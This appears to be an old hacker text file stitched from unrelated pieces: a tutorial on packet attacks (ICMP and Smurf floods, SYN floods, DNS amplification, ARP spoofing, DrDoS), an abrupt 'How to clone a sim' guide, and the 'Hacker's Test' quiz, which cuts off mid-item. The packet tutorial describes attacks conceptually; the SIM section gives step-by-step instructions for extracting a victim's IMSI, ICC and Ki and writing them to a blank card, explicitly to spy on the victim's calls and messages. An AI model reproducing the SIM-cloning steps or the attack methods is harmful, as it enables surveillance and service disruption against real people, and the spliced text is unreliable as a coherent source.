PACKET ATTACKS - VERSION 1.1


Let me start by saying the internet is full of wonderful tools and papers like this one. Alot of these things can help you
increase your knowledge, perhaps your job or more. But just as easily as you can learn from them, people read into them to
much and decide to harm other peoples work for no apparent reason. Let it be known that is in no way the purpose of this
paper. A true hacker is one who strives to attain the answers for themselves through curiosity. Its the path we take to
those answers that makes us hackers, not destruction of other peoples work. So with that said, please enjoy my work, as I
have enjoyed writing it.

The flow of data has always captured my interest. Just how does it work, how can we dissect it and use it to our advantage.
Well I have spent a long time studying all of this, and that is why I wrote this paper. It's a collection of run on s
entences on different packet attacks and how they work. Now we all know you can learn all you ever wanted to know about the
specifications of a protocol by reading its 30 page RFC document. But that is the protocol according to design, in the wild
its a different story all together. 'Packet Attacks' covers everything from basic DOS attacks to TCP/IP hijacking. Hence the
name "Packet Attacks". This paper also focuses not just on attacks but practical ways to prevent such attacks and ideas on
new methods to help us stop them and secure our networks.


Introduction:
TCP/IP Packet Switching Networks
OSI MODEL


---Chapter 1.---
Section a.
 Introduction to DDOS/DOS & Packet Attacks
Section b.
 How attacks are crafted

---Chapter 2.---
Section a. (attacks)
   ICMP
   Smurf
   SYN/ACK
   UDP
   DNS
   ARP
   DrDOS
   Special Bot / Trojans
   Worm DOS  
   Unicode ping flood  (new!)
Section b.
   Phasing
Section c. (hacks)
   TCP hijacking
   Sniffing
   Scans
   Information gathering / Footprinting
Section d.
   Defense against these attacks
   Attack Detection
   Intrusion Detection
Section e.
   IPSEC
   NAT as a means of security

---Chapter 3.---
 Section a.
   The future of TCP/IP as a means of using IPv6

---Chapter 4. ---
 Section a.
   New security application / protocol

-----
Introduction.

Well I assume most of you reading this paper already have a good understanding of TCP/IP and how it works so I wont get to
much into detail on that, but I will scrape the surface on the parts we NEED to discuss. The internet is a MASSIVE web of
machines all connected to one another through a series of hardware devices known as routers, switches, hubs, bridges and
lots more. All of these devices (although some are smarter then others) push along packets. Our operating systems and
applications craft these packets in order to send data to one another over the wire. Each packet, although varying in size,
carries a small bit of data to and from one host to another. Each packet must also carry its own personal information such
as where it came from and where its headed. Of course there is a lot more to a packet then just this information. But as far
as attacks go this is the crucial information we need to look at. Now there are many many different types of protocols that
craft many different types of packets. And they are all read differently when they are received at the other end. Where as
an ARP packet may tell a host who has this MAC address on this subnet, a TCP packet might transfer the last few bits in that
MP3 your downloading. Regardless the data, all of these packets use the same wire to move to and from locations. I couldn't
possibly discuss every protocol and packet structure in this one paper. The average end user takes for granted all of this
running in the background while they surf the net. Most people dont understand the complexity of this internet we are all so
familiar with, the chat rooms etc. But there are people who do, and there are people who take advantage of that. Reverse
engineering has led to the creation of attacks using the basic fundamentals these protocols rely on. And since TCP/IP is so
embedded in our infrastructure we must adapt and learn to defend each new attack.

OSI MODEL

Open Systems Interconnection model, is a seven layered networking design. Its an industry standard that defines exactly how
data is transffered between protocol to protocol. Not every protocol follows the OSI model exactly and some do. TCP the
internets main mode of data transport does not follow it exactly. Let me take you through a brief over view of the OSI model.

Layer Seven : Application Layer
This layer is obviously application specific, it provides everything from authentication to email to ftp and telnet, the
list goes on. Its specifically for end user processes, what we input into our applications we can see on our screens.

Layer Six : Presentation Layer
This layer changes and possibly encrypts the data so that the application layer can understand it. (you will understand what
this means in a few minutes)

Layer Five : Session Layer
Think of this layer as Establishment, Control and Termination of the sessions formed by the
application(client) to a remote host(server).

Layer Four : Transport Layer
This layer is responsible for the invisible transfer of data between host to host. It is there to ensure all data transfer
goes accordingly. The protocols used are, UDP and TCP.

Layer Three : Network Layer
This layer is for error correction, packet sequencing, and for transmitting data from node to node. Addressing is also
another function of this layer in inter-networking.

Layer Two : Data Link Layer
This layer decodes and encodes packets into bits so they are ready for the physical layer. It also handles error correction
in the physical layer. This layer is also divided into two different sub-layers. The LLC (logical link control) and MAC
(media access control) sub layers. The LLC sub layer provides control for frame synchronization and error checking. The MAC
sub layer controls how a computer on your network has access to data.

Layer One : Physical Layer
This layer is the actual movement of the data. Using electrical impulse or some other form of data movement is pushes the
bit stream towards the other host. This layer is the hardware level, the ethernet card, the wire etc. There are many
protocols within this layer.

You may ask yourself why I listed these from 7 to 1. Well I did to show you how the OSI model really works. Layer Seven
really comes first, the end user types something into his instant messenger (for example) and the data flows down through
the OSI model being encapsulated and changed at every level it has to be changed or corrected at. The data travels the wire
and at the other end it moves back up the OSI model all the way back up to layer seven where the other host can read it in
the original form it was sent. So theres a VERY basic understanding of the OSI model and how it works to transmit data from
host to host. There is alot more protocols and parts to the OSI model but this basic representation should provide a firm
understanding.

To understand all of this more in depth please get your hands on a few RFC (request for comment) documents and start reading.
Because it will take you a very long time to understand exactly how TCP/IP works.  If your very knowledgeable in the way
TCP/IP works then this paper should make alot of sense to you, perhaps even bore you! :(  On the other hand if you dont
understand TCP/IP as well as you would like to, you still might get something out of this. I try and explain all of the
technical writing as easily as I can. Feel free to email me if you have a question or comment. Thanks :)
Data_Clast

---------------------------------------------------------------------------------------
Chapter 1.

Section a.

 The most common attack on the internet today is a denial of service attack. There are many programs on the internet today
that will assist anyone in crafting one of these attacks. The sad part is for as easy as they are to make their power can be
destructive when used properly. No matter what kind of packet attack it may be most are based on the same principal, volume.
Thousand and thousands of spoofed packets will eat up network resources within minutes, choking and essentially 'killing'
any network. There are many types of packet attacks. Some are more sophisticated then others. I will also talk about TCP/IP
hijacking and your typical port and vulnerability scans among other things.

 Why do people launch these attacks? How are they launched? How do they exactly (technically speaking) 'choke a network'?!
Hold tight im getting to that. The lower end of these attacks are usually launched by what the hacker community calls a
script kiddie. You see a hacker isnt a mindless web defacing juvenile (please see the mentors manifesto). A hacker is a
person of true intellect and would never craft such an attack for no reason. But these lower end attacks are usually
launched at peoples individual machines. Their IP address's may come from an IRC chat room, yahoo messenger, AOL, ICQ, or
whatever other messenger you might use. Although not as sophisticated, these 'lower end' attacks can still knock an
individual machine offline in minutes. The slightly more advanced attacks may be aimed at a business competitor in order to
slow their sales or disrupt their outgoing internet connection. Whatever the reason may be they are usually launched for a
reason. Attacking a box for no reason is typically useless and will only take up your own bandwidth.

The more sophisticated attacks are aimed at government and root points of the internet. Such as the attacks on the root DNS
servers in October of 2002. These attacks were sophisticated in the way they were crafted. The attacks lasted for over an
hour and successfully took out a few of the servers. If the attack had lasted just a few more minutes who knows the damage
it could have caused. The possibility of the authorities solving these attacks and apprehending the offenders is slim to
none because they are created and launched by skilled malicious individuals. They were also distributed denial of service
attacks. Which means the 'zombie' machines that attacked the servers were spread out all over the world. We will touch more
on that later though.

Section b.

 You will learn more about how these individual attacks are crafted and how they work later in this paper but this is
small introduction so you can get a vague idea. Creating spoofed packets requires an open socket. This socket binds to an
IP and a port and allows you to inject a packet onto the wire or accept any incoming packets to that IP and port. *NIX
openly supports open socket programming (many tutorials on this type of programming). Which means you can code programs that
create packets and then inject them into the network with ease. An example of this would be a program called "SENDIP" which
allows you to create custom packets, and it supports many protocols (another good program is nemesis). I have written a few
tutorials using SENDIP, I think its a great program for both advanced and new network engineers to use. It will help you
learn about packet structure and the different protocols it supports. Microsoft is not an open source company, which pretty
much makes it even harder to find help in creating these sorts of programs for Windows. But it is possible to craft these
attacks from within a Windows environment. Its referred to 'Winsock' programming. Infact most of these DDOS attacks are
because of vulnerable Windows boxes out on the net. They are sitting ducks for trojan horses and other programs that craft
these attacks on servers when commanded from a client program to do so. Most end users do not understand security and how
easy it is to break into someones home computer, so they lack firewalls and virus scanners. This leads to many zombie
machines available to hackers disposal on the net. All one has to do is scan a class C subnet for open trojan ports and
hack their way into those trojans and use them as a backdoor, another zombie is created for attacking remote targets. Almost
every program that interacts with TCP/IP generates packets to and from places, this is valid traffic. As you read you will
distinguish the difference between valid and non valid, as it easy pretty easy to understand what I am explaining when I say
"attack". When creating an open socket and crafting spoofed packets these programs tell the kernel they are going to
construct their own IP headers. Usually this information is put on by the kernel before exiting the machine. But in this
instance we are telling the kernel we want to specify our own information. Not all operating systems will allow this. And
no I dont have a detailed list of which do and which dont. Most of the experiments I have conducted on my network used
different versions of RedHat Linux, Mandrake Linux, and Windows XP.


Chapter 2.

Section a.

There are several different types of packet attacks. Theres the simple brute flood of ICMP packets which floods a network
and eats up all the available bandwidth. And then there are more sophisticated attacks like the Smurf or SYN/ACK attack.
All of these attacks target different things. While the SMURF attack may target the general network its attacking, the
SYN/ACK attack targets a specific host or service running on a host. We also must take into consideration when a target is
attacked it may not be the only machine affected. There are many routers and other boxes transfering the data between point
A and point B. Other peoples legitimate data is flowing between them, and may be disrupted by the packet flood. Even a top
of the line router can only handle so much data. And unfortunately it is very easy to attain soure code for these attacks
all over the web. Lets take a more detailed look at each attack.


ICMP brute flood attack.

ICMP works on top of TCP. The ICMP protocol is simple yet very effective. Its used for error correcting and testing network
connectivity. Your average PING program uses ICMP packets to test network connectivity. By sending a small amount of
arbitrary data in an ECHO_REQUEST packet it waits for a reply from the target host, simple right? A typical ICMP packet is
called an ECHO_REQUEST. You send 4 or 5 of these at a target machine and when it arrives there it requests an ECHO_REPLY.
Thats when everything is done according to design. If you want more info on an ICMP packet and how it works then read my
tutorial on that!
http://www.theory-x.org/dataclast/_content/MPS.txt

In this attack the source IP address is spoofed. So now hundreds, thousands of ECHO_REQUEST packets rush towards their
destination. They reach point B, request an ECHO_REPLY for every ECHO_REQUEST sent. Point B says OK, reads the source IP.
The source IP ends up being unreachable. But point B is waiting a small amount of time (milliseconds) to determine that for
every packet thats hitting it. It will be a few more moments before the process relinquishes this small bit of memory back
to the system. This adds up to a great deal of packets and memory allocation building up. Now if these packets are coming
from multiple source zombies (DDOS) then this means there each coming from different routes. So even if one ISP stops one
attack, there are still many more zombie machines attacking the victim. All of this is eating up time and bandwidth, because
with every millisecond that passes more and more bandwidth is being taken up. Eventually point B can no longer keep up with
the ECHO_REQUESTS and his connection is completely flooded and of no use. On an unprotected system or router this attack
can be very consuming. This attack is also sometimes referred to a bandwidth attack. Even if the target is running an
advanced firewall it cannot protect the wire it connected to from being flooded with packets. There have been changes in
this attack as well. On the net there are what we call amplifiers. On every network there are the network and subnet
addresses. In many default configurations when you ping either one of these addresses they multiply the echo requests by 4
or more. So a zombie would attack a vulnerable network (.0) or subnet address (.255) with a spoofed source IP, being the
victims real IP. So even tho the traffic becomes valid as far as IP addresses go. The victim gets bombarded with massive
ECHO_REPLY packets. You will see more of this description in other attacks, as it works for some of those to.

[zombie machine] -->ICMP ECHO_REQUEST (source IP = 1.1.1.1) -->-->--> [target]
[??????????????]           ICMP ECHO_REPLY (destination 1.1.1.1 ?)<-- [target]

Hopefully that simple drawing shows you exactly how this attack works. Its very very simple, massive ICMP packets with
spoofed address's taking up network resources. The simplest of attacks.


Smurf attack.

 (first part is repeat from ICMP attack) There have been changes in the ICMP attack. On the net there are what we call
amplifiers. On every network there are the network and subnet addresses. In many default configurations when you ping either
one of these addresses they multiply the echo requests by 4 or more. So a zombie would attack a vulnerable network (.0) or
subnet address (.255) with a spoofed source IP, being the victims real IP. So even tho the traffic becomes valid as far as
IP addresses go. The victim gets bombarded with massive ECHO_REPLY packets. You will see more of this description in other
attacks, as it works for those to.

You can try this attack on your home network by simply opening a packet sniffer on each machine that is on. Pick a machine,
any machine and ping your broadcast address. Mine is 192.168.0.255  Immediately you see each machine receiving a broadcast
packet. Now imagine its several hundred and each one has a spoofed source IP address. Its a brute ICMP attack on a massive
scale, this possibilities to this attack are endless. You could easily implement this attack in anyway you chose. You could
spoof the victims real IP as your source IP and create massive volumes of legit ECHO_REPLY packets. Even though its valid
traffic, its 4x or more times the normal load of valid traffic. This consumes the connection and valid traffic cant pass,
or passes so slowly it makes no difference to the end user.

[zombie machine] --> ICMP ECHO_REQUEST source ip = 10.2.2.2 --> to: broadcast router 4.1.0.255 (router multiplies the
ECHO_REPLY packets by 4x! --> --> --> --> [victim 10.2.2.2]


SYN/ACK attack.

The SYN/ACK attack is a very powerful attack. SYN/ACK packets are also used in TCP hijacking, and the TCP/IP three way
handshake. When an application wants to connect with a server somewhere over the net via a TCP connection (connection vs
connectionless data transfer (UDP)) it first sends a SYN packet. The SYN packet tells the target machine he wants to make
a connection on a certain specified port, and then send data. When the target machine read the SYN packet it replies to
the original host with a SYN packet of his own and an ACK (acknowledgement) packet with sequence and ack numbers. These SEQ
and ACK numbers are used to synchronize the data transfer, incase one or two packets gets lost or slowed down along its
route, it can be assembled again in the correct order. The orignal machine replies again with another SYN ACK packet
combination acknowledging the sequencing numbers and then it starts to send data. When it creates this connection a tiny
piece of memory is allocated to hold the connection while the packets are in route. Now a SYN/ACK attack would consist of
spoofing the source IP address on the original SYN packet. The target receives the request for a connection, reads the
spoofed source IP and tries to send its own SYN and ACK packet to a destination that does not exist. Most operating systems
will continue to send SYN/ACK packets if they dont receive a reply as a method of error correction and guaranteed data
delivery. Just like in the ICMP attack the machine has to wait a few milliseconds before abandoning all hope of reaching
the machine. So these tiny allocated spaces of memory are building up with every spoofed packet that arrives at the target.
This attack is very powerful and can disable a service running on the target machine in a matter of minutes. Not to mention
all the available bandwidth is eaten with thousands and thousands of spoofed packets. So there is the SYN/ACK attack in a
brief description.

[zombie machine] --> SYN packet (source IP 1.1.1.1, port = 23 telnet) (seq = 100) --> [target]
[??????????????] <-- SYN/ACK packets sent (seq = 300) (ack = 101) <-- [target]

As you can see from the simple drawing above the target machine has no idea who is sending the SYN packets and the telnet
server he is running on port 23 would most likely crash. At best the telnet daemon would not allow any other legitimate
traffic through, as it could not gather enough resources (memory, bandwidth) to make the connection due to all the spoofed
packets.

Another use of this attack is to disconnect a user from their current TCP session. By spoofing SYN/ACK packets to a server
a client is currently using. An attacker would place a "FIN" flag in the packets, this tells the server the client is done
sending data. Client uses his connection and attacker walks away undetected, because it only took one packet to accomplish
this.


UDP attack

UDP is a protocol that is used to transfer data. Short for USER DATAGRAM PROTOCOL. UDP offers very little error correction
and is used as an alternative means for data transfer. It doesn't require the 3 way handshake such as the SYN/ACK method,
so its initial attack may not take down a remote daemon as quickly. UDP is generally used to broadcast messages over a
network. A UDP attack would consist of spoofing the source IP addresses and specifying a port number like in the SYN attack
above. UDP packets are generally large because they are usually used on closed 100mb subnets (LANS). So an attack would set
flags in the packets and fragment them (break them up and flag where in the packet they broke, so they can be reassembled
on the receiving end). For example in Windows 2000 there was a remote UDP DOS exploit that used the IKE service running on
port 500. All an attacker had to do was connect to port 500 on a random machine with that port open. Start sending massive
UDP packets (above 500 bytes) to that service and the CPU usage would hit 99% and the machine would lock up. The typical
ports that accept UDP packets are 7, 13, 19 and 37 on a Windows box.

DNS attack

The DNS attack is a special one. Not as easily crafted as the others, there arent that many tools readily available to the
average script kiddie to construct such an attack. The DNS protocol is used for name resolution, 216.239.35.100 = google.com,
simple as that? Well not really. A DNS attack is based on the fact that a DNS query takes very little data and bandwidth to
create, but a DNS response is much bigger. So this is how a DNS attack would look like.

10.10.10.10 = victims IP

[dns query packet (who is google.com)] --> source IP is 10.10.10.10 --> [dns server]
[dns server] --> --> --> [dns response] [dns response] [dns response] --> [victim]

As you can see the attack is sort of relayed from a legitimate DNS server. Although the DNS response packets are 'legit'
there is a massive flood of them because the DNS server that is sending them is a very good machine on a very good
connection. The end user, most likely a home pc, gets flooded with these huge DNS response packets it never asked for.

ARP attack

The arp attack is a special one, it can be used to 'hijack' a tcp connection currently in session or it can be used to
sniff the legitimate traffic on a wire other then your own. Which is a very dangerous thing in the information world we
live in today. There are a few methods of this attack. Lets say person1, attacker, and server are all on the same subnet.
Person1 and server currently have an FTP session open. Attacker sends both server and person1 an ARP packet containing an
invalid MAC address. Now both of their arp tables are messed up for atleast 30 seconds. Server and person1 cant find that
invalid MAC address so they send their data to the IP its associated with, the attacker. So in this case the attacker has a
sniffer setup and hes collecting a ton of data. Now the attacker (an advanced one at that) can issue commands as person1 to
the server. This attack takes timing and skill to pull off on the internet, but on a LAN its very easy. It only allows for
maybe 30 or so seconds of sniffing, until their arp table is constructed properly again.

DRDOS attack

A DRDOS attack uses a little of other attacks to inflict damage. This attack spoofs the source IP address of SYN packets
to the IP of the victim. It requires a third party. This is the part of the attack that makes it so easy. All it needs is
some ftp, webserver, telnet.. ANY service that will reply with an ACK packet, anywhere on the internet. Could be angelfires
free ftp servers, could be your neighbors web server running off his 233mhz compaq with IIS 4.0. It doesn't matter! The SYN
packets are sent to that services IP address and they of course reply with a steady stream of SYN/ACK packets to the victim.
Most likely directed towards an open port on the victims machine, crashing that service and the system. These attacks are
near impossible to track down. This attack is quite possibly the strongest DOS attack in my opinion. For every SYN packet
you send the middle man, it sends out up to 4 SYN/ACK combinations to the victim. And each time the victim doesn't respond
the middle man sends even more (error correction). This allows the attacker to contruct a massive attack from just one
machine with a broadband connection. There are more dangers to this attack as well, there are hundreds of thousands of FTP,
webservers and many more services running on the net today that will deflect these SYN/ACK packets at the victim. So in
theory this attack could use any number of 'middle man' servers to bombard your network with packets.

How to clone a sim

UMany of my friends asked me abt the cloning of sim , i mostely refused them by telling that its illigal bt somtymes it can be a weapon of survoing so m presenting selftested method for that.
Plz write me if its not working...
How to clone sim card.
By cloning sim card , you can spy on victims call
and messages. So it will help you in Hacking.
.Requirements
1) Blank sim card available online as well as
offline.
2)A Sim card frimware writer (online as well as off
market)
3) woron scaner ( search it on google )
4) Sim emulator ( search it on google)
5)victims sim for 20minsSo here we start.
1- Plug victims sim and install woron scaner,
configure it and search IMSI number then search
ICC number and at last search KI number. Note
down this number.
2- Now remove victims sim. And insert blank sim.
3-Open sim emu , click on configurations tag and
enter IMSI ICC and Ki number of victim sim. The
number you enter should be in (country code)(10
digit number) format. Now click on Write to disc
button, a write EEPROM window will appear, name
it as supersim.HEX and save it.
4-Now run the writing task and click on done when
it is complete. So here we complete cloning
Note: COMP128V1 and V2 are cloneable. If it take
more then 45 min to scan KI number then it is not
cloneable
Note :- this tut is only for educational purpose this method is 100% safe and tasted

Hacker's Test

 This test was conceived and written by Felix Lee, John Hayes and Angela Thomas. (Herewith a compendium of fact and folklore about computer hackerdom,  cunningly disguised as a test.)   Scoring - Count 1 for each item that you have done, or each           question that you can answer correctly.   If you score is between:                    You are             0x000 and 0x010       ->         Computer Illiterate            0x011 and 0x040       ->         a User            0x041 and 0x080       ->         an Operator            0x081 and 0x0C0       ->         a Nerd            0x0C1 and 0x100       ->         a Hacker            0x101 and 0x180       ->         a Guru            0x181 and 0x200       ->         a Wizard  Note: If you don't understand the scoring, stop here.  And now for the questions...  0001 Have you ever used a computer? 0002 ... for more than 4 hours continuously? 0003 ... more than 8 hours? 0004 ... more than 16 hours? 0005 ... more than 32 hours?  0006 Have you ever patched paper tape?  0007 Have you ever missed a class while programming? 0008 ... Missed an examination? 0009 ... Missed a wedding? 0010 ... Missed your own wedding?  0011 Have you ever programmed while intoxicated? 0012 ... Did it make sense the next day?  0013 Have you ever written a flight simulator?  0014 Have you ever voided the warranty on your equipment?  0015 Ever change the value of 4? 0016 ... Unintentionally? 0017 ... In a language other than Fortran?  0018 Do you use DWIM to make life interesting?  0019 Have you named a computer?  0020 Do you complain when a "feature" you use gets fixed?  0021 Do you eat slime-molds?  0022 Do you know how many days old you are?  0023 Have you ever wanted to download pizza?  0024 Have you ever invented a computer joke? 0025 ... Did someone not 'get' it?  0026 Can you recite Jabberwocky? 0027 ... Backwards?  0028 Have you seen "Donald Duck in Mathemagic Land"?  0029 Have you seen "Tron"?  0030 Have you seen "Wargames"?  0031 Do you know what ASCII stands for? 0032 ... EBCDIC?  0033 Can you read and write ASCII in hex or octal? 0034 Do you know the names of all the ASCII control codes?  0035 Can you read and write EBCDIC in hex?  0036 Can you convert from EBCDIC to ASCII and vice versa?  0037 Do you know what characters are the same in both ASCII and EBCDIC?  0038 Do you know maxint on your system?  0039 Ever define your own numerical type to get better precision?  0040 Can you name powers of two up to 2**16 in arbitrary order? 0041 ... up to 2**32? 0042 ... up to 2**64?  0043 Can you read a punched card, looking at the holes? 0044 ... feeling the holes?  0045 Have you ever patched binary code? 0046 ... While the program was running?  0047 Have you ever used program overlays?  0048 Have you met any IBM vice-president? 0049 Do you know Dennis, Bill, or Ken?  0050 Have you ever taken a picture of a CRT? 0051 Have you ever played a videotape on your CRT?  0052 Have you ever digitized a picture?  0053 Did you ever forget to mount a scratch monkey?  0054 Have you ever optimized an idle loop?  0055 Did you ever optimize a bubble sort?  0056 Does your terminal/computer talk to you?  0057 Have you ever talked into an acoustic modem? 0058 ... Did it answer?  0059 Can you whistle 300 baud? 0060 ... 1200 baud?  0061 Can you whistle a telephone number?  0062 Have you witnessed a disk crash? 0063 Have you made a disk drive "walk"?  0064 Can you build a puffer train? 0065 ... Do you know what it is?  0066 Can you play music on your line printer? 0067 ... Your disk drive? 0068 ... Your tape drive?  0069 Do you have a Snoopy calendar? 0070 ... Is it out-of-date?  0071 Do you have a line printer picture of... 0072 ... the Mona Lisa? 0073 ... the Enterprise? 0074 ... Einstein? 0075 ... Oliver? 0076 Have you ever made a line printer picture?  0077 Do you know what the following stand for? 0078 ... DASD 0079 ... Emacs 0080 ... ITS 0081 ... RSTS/E 0082 ... SNA 0083 ... Spool 0084 ... TCP/IP       Have you ever used 0085 ... TPU? 0086 ... TECO? 0087 ... Emacs? 0088 ... ed? 0089 ... vi? 0090 ... Xedit (in VM/CMS)? 0091 ... SOS? 0092 ... EDT? 0093 ... Wordstar?  0094 Have you ever written a CLIST?       Have you ever programmed in 0095 ... the X windowing system? 0096 ... CICS?  0097 Have you ever received a Fax or a photocopy of a floppy?  0098 Have you ever shown a novice the "any" key? 0099 ... Was it the power switch?       Have you ever attended 0100 ... Usenix? 0101 ... DECUS? 0102 ... SHARE? 0103 ... SIGGRAPH? 0104 ... NetCon?  0105 Have you ever participated in a standards group?  0106 Have you ever debugged machine code over the telephone?  0107 Have you ever seen voice mail? 0108 ... Can you read it?  0109 Do you solve word puzzles with an on-line dictionary?  0110 Have you ever taken a Turing test? 0111 ... Did you fail?  0112 Ever drop a card deck? 0113 ... Did you successfully put it back together? 0114 ... Without looking?  0115 Have you ever used IPCS?  0116 Have you ever received a case of beer with your computer?  0117 Does your computer come in 'designer' colors?  0118 Ever interrupted a UPS?  0119 Ever mask an NMI?  0120 Have you ever set off a Halon system? 0121 ... Intentionally? 0122 ... Do you still work there?  0123 Have you ever hit the emergency power switch? 0124 ... Intentionally?  0125 Do you have any defunct documentation? 0126 ... Do you still read it?  0127 Ever reverse-engineer or decompile a program? 0128 ... Did you find bugs in it?  0129 Ever help the person behind the counter with their terminal/computer?  0130 Ever tried rack mounting your telephone?  0131 Ever thrown a computer from more than two stories high?  0132 Ever patched a bug the vendor does not acknowledge?  0133 Ever fix a hardware problem in software? 0134 ... Vice versa?  0135 Ever belong to a user/support group?  0136 Ever been mentioned in Computer Recreations?  0137 Ever had your activities mentioned in the newspaper? 0138 ... Did you get away with it?  0139 Ever engage a drum brake while the drum was spinning?  0140 Ever write comments in a non-native language?  0141 Ever physically destroy equipment from software?  0142 Ever tried to improve your score on the Hacker Test?  0143 Do you take listings with you to lunch? 0144 ... To bed?  0145 Ever patch a microcode bug? 0146 ... around a microcode bug?  0147 Can you program a Turing machine?  0148 Can you convert postfix to prefix in your head?  0149 Can you convert hex to octal in your head?  0150 Do you know how to use a Kleene star?  0151 Have you ever starved while dining with philosophers?  0152 Have you solved the halting problem? 0153 ... Correctly?  0154 Ever deadlock trying eating spaghetti?  0155 Ever written a self-reproducing program?  0156 Ever swapped out the swapper?  0157 Can you read a state diagram? 0158 ... Do you need one?  0159 Ever create an unkillable program? 0160 ... Intentionally?  0161 Ever been asked for a cookie?  0162 Ever speed up a system by removing a jumper?       * Do you know...  0163 Do you know who wrote Rogue? 0164 ... Rogomatic?  0165 Do you know Gray code?  0166 Do you know what HCF means? 0167 ... Ever use it? 0168 ... Intentionally?  0169 Do you know what a lace card is? 0170 ... Ever make one?  0171 Do you know the end of the epoch? 0172 ... Have you celebrated the end of an epoch? 0173 ... Did you have to rewrite code?  0174 Do you know the difference between DTE and DCE?  0175 Do you know the RS-232C pinout? 0176 ... Can you wire a connector without looking?       * Do you have...  0177 Do you have a copy of Dec Wars? 0178 Do you have the Canonical Collection of Lightbulb Jokes? 0179 Do you have a copy of the Hacker's dictionary? 0180 ... Did you contribute to it?  0181 Do you have a flowchart template? 0182 ... Is it unused?  0183 Do you have your own fortune-cookie file?  0184 Do you have the Anarchist's Cookbook? 0185 ... Ever make anything from it?  0186 Do you own a modem? 0187 ... a terminal? 0188 ... a toy computer? 0189 ... a personal computer? 0190 ... a minicomputer? 0191 ... a mainframe? 0192 ... a supercomputer? 0193 ... a hypercube? 0194 ... a printer? 0195 ... a laser printer? 0196 ... a tape drive? 0197 ... an outmoded peripheral device?  0198 Do you have a programmable calculator? 0199 ... Is it RPN?  0200 Have you ever owned more than 1 computer? 0201 ... 4 computers? 0202 ... 16 computers?  0203 Do you have a SLIP line? 0204 ... a T1 line?  0205 Do you have a separate phone line for your terminal/computer? 0206 ... Is it legal?  0207 Do you have core memory? 0208 ... drum storage? 0209 ... bubble memory?  0210 Do you use more than 16 megabytes of disk space? 0211 ... 256 megabytes? 0212 ... 1 gigabyte? 0213 ... 16 gigabytes? 0214 ... 256 gigabytes? 0215 ... 1 terabyte?  0216 Do you have an optical disk/disk drive?  0217 Do you have a personal magnetic tape library? 0218 ... Is it unlabelled?  0219 Do you own more than 16 floppy disks? 0220 ... 64 floppy disks? 0221 ... 256 floppy disks? 0222 ... 1024 floppy disks?  0223 Do you have any 8-inch disks?  0224 Do you have an internal stack?  0225 Do you have a clock interrupt?  0226 Do you own volumes 1 to 3 of _The Art of Computer Programming_? 0227 ... Have you done all the exercises? 0228 ... Do you have a MIX simulator? 0229 ... Can you name the unwritten volumes?  0230 Can you quote from _The Mythical Man-month_? 0231 ... Did you participate in the OS/360 project?  0232 Do you have a TTL handbook?  0233 Do you have printouts more than three years old?       * Career  0234 Do you have a job? 0235 ... Have you ever had a job? 0236 ... Was it computer-related?  0237 Do you work irregular hours?  0238 Have you ever been a system administrator?  0239 Do you have more megabytes than megabucks?  0240 Have you ever downgraded your job to upgrade your processing power?  0241 Is your job secure? 0242 ... Do you have code to prove it?  0243 Have you ever had a security clearance?       * Games  0244 Have you ever played Pong?       Have you ever played 0246 ... Spacewar? 0247 ... Star Trek? 0248 ... Wumpus? 0249 ... Lunar Lander? 0250 ... Empire?       Have you ever beaten 0251 ... Moria 4.8? 0252 ... Rogue 3.6? 0253 ... Rogue 5.3? 0254 ... Larn? 0255 ... Hack 1.0.3? 0256 ... Nethack 2.4?  0257 Can you get a better score on Rogue than Rogomatic?  0258 Have you ever solved Adventure? 0259 ... Zork?  0260 Have you ever written any redcode?  0261 Have you ever written an adventure program? 0262 ... a real-time game? 0263 ... a multi-player game? 0264 ... a networked game?  0265 Can you out-doctor Eliza?       * Hardware  0266 Have you ever used a light pen? 0267 ... did you build it?       Have you ever used 0268 ... a teletype? 0269 ... a paper tape? 0270 ... a decwriter? 0271 ... a card reader/punch? 0272 ... a SOL?       Have you ever built 0273 ... an Altair? 0274 ... a Heath/Zenith computer?       Do you know how to use 0275 ... an oscilliscope? 0276 ... a voltmeter? 0277 ... a frequency counter? 0278 ... a logic probe? 0279 ... a wirewrap tool? 0280 ... a soldering iron? 0281 ... a logic analyzer?  0282 Have you ever designed an LSI chip? 0283 ... has it been fabricated?  0284 Have you ever etched a printed circuit board?       * Historical  0285 Have you ever toggled in boot code on the front panel? 0286 ... from memory?  0287 Can you program an Eniac?  0288 Ever seen a 90 column card?       * IBM  0289 Do you recite IBM part numbers in your sleep? 0290 Do you know what IBM part number 7320154 is?  0291 Do you understand 3270 data streams?  0292 Do you know what the VM privilege classes are?  0293 Have you IPLed an IBM off the tape drive? 0294 ... off a card reader?  0295 Can you sing something from the IBM Songbook?       * Languages  0296 Do you know more than 4 programming languages? 0297 ... 8 languages? 0298 ... 16 languages? 0299 ... 32 languages?  0300 Have you ever designed a programming language?  0301 Do you know what Basic stands for? 0302 ... Pascal?  0303 Can you program in Basic? 0304 ... Do you admit it?  0305 Can you program in Cobol? 0306 ... Do you deny it?  0307 Do you know Pascal? 0308 ... Modula-2? 0309 ... Oberon? 0310 ... More that two Wirth languages? 0311 ... Can you recite a Nicklaus Wirth joke?  0312 Do you know Algol-60? 0313 ... Algol-W? 0314 ... Algol-68? 0315 ... Do you understand the Algol-68 report? 0316 ... Do you like two-level grammars?  0317 Can you program in assembler on 2 different machines? 0318 ... on 4 different machines? 0319 ... on 8 different machines?       Do you know 0320 ... APL? 0321 ... Ada? 0322 ... BCPL? 0323 ... C++? 0324 ... C? 0325 ... Comal? 0326 ... Eiffel? 0327 ... Forth? 0328 ... Fortran? 0329 ... Hypertalk? 0330 ... Icon? 0331 ... Lisp? 0332 ... Logo? 0333 ... MIIS? 0334 ... MUMPS? 0335 ... PL/I? 0336 ... Pilot? 0337 ... Plato? 0338 ... Prolog? 0339 ... RPG? 0340 ... Rexx (or ARexx)? 0341 ... SETL? 0342 ... Smalltalk? 0343 ... Snobol? 0344 ... VHDL? 0345 ... any assembly language?  0346 Can you talk VT-100? 0347 ... Postscript? 0348 ... SMTP? 0349 ... UUCP? 0350 ... English?       * Micros  0351 Ever copy a copy-protected disk? 0352 Ever create a copy-protection scheme?  0353 Have you ever made a "flippy" disk?  0354 Have you ever recovered data from a damaged disk?  0355 Ever boot a naked floppy?       * Networking  0356 Have you ever been logged in to two different timezones at once?  0357 Have you memorized the UUCP map for your country? 0358 ... For any country?  0359 Have you ever found a sendmail bug? 0360 ... Was it a security hole?  0361 Have you memorized the HOSTS.TXT table? 0362 ... Are you up to date?  0363 Can you name all the top-level nameservers and their addresses?  0364 Do you know RFC-822 by heart? 0365 ... Can you recite all the errors in it?  0366 Have you written a Sendmail configuration file? 0367 ... Does it work? 0368 ... Do you 